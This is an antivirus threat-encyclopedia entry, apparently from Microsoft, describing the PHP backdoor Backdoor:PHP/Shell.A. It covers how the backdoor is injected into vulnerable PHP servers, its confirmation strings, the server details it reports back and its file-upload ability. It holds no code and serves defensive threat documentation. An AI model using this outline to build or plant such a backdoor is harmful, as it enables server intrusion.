Home / malware Backdoor:PHP/Shell.A
First posted on 05 January 2012.
Source: MicrosoftAliases :
Backdoor:PHP/Shell.A is also known as HTML/Iframe (AhnLab), PHP/BackDoor (AVG), Trojan.PHPInfo.A (Avira), PHP.BackDoor.9 (BitDefender), HTML/Iframe.B.Gen (ESET), Backdoor.PHP.Agent.hc (Kaspersky), Backdoor.Script.PHP.fr (Rising AV), Mal/PHPInfo-A (Sophos), PHP.Backdoor.Trojan (Symantec).
Explanation :
Backdoor:PHP/Shell.A is a Hypertext Preprocessor (.PHP) script that is used to compromise a server running a vulnerable PHP application. Once compromised, information is returned to a remote attacker via the script execution request.
Top
Backdoor:PHP/Shell.A is a Hypertext Preprocessor (.PHP) script that is used to compromise a server running a vulnerable PHP application. Once compromised, information is returned to a remote attacker via the script execution request.
Installation
In a typical attack scenario, a remote attacker uses an injection vulnerability present in the target server's PHP application to execute the malicious PHP script. Upon successfully attacking the server, the trojan script sends a confirmation message to the attacker such as "<name> was here", where "<name>" was observed to be any one of the following:
- 0sirys
- raCrew
- 1x33x7
Payload
Communicates with a remote attackerIf the attack sequence is successful, the attacked server will return various details about the server to the attacker, such as the following:
- Description and version of the operating system that PHP is running within
- User ID that PHP is running as
- Free, used, and total disk space available of the current driver, on the server running PHP
Uploads arbitrary files
Some variants of this threat allow the attacker to upload arbitrary files.
Analysis by Chris Stubbs
Last update 05 January 2012
